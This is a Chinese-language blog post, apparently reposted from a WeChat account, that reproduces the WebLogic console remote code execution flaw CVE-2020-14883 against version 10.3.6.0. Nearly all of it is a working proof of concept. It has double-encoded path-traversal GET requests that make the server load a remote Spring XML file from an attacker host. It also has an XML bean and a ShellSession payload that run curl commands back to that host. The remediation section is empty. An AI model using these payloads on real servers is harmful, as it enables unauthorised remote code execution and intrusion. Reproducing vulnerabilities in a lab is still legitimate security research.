0X01 简介
复现环境:
Oracle WebLogic Server 10.3.6.0
0X02 漏洞复现
Oracle WebLogic Server 10.3.6.0.0 POC:
com.tangosol.coherence.mvel2.sh.ShellSession类只能在12.2.1.3.0以上版本利用,10.3.6.0.0可以用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext类
通过此类,远程加载一个xml,执行命令。
POC:
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.245.129:9999/1.xml") HTTP/1.1
Host: 192.168.245.134:7001
XML:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>curl</value> <value>http://192.168.245.129:9999/123</value> </list> </constructor-arg> </bean></beans>
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl+http://192.168.245.129:9999/456789');") HTTP/1.1
Host: 192.168.245.134:7001
0X03 修复建议
0X04 写在最后
回复“加群”,获取群号。
侵删!
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Weblogic 代码执行漏洞(CVE-2020-14883)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论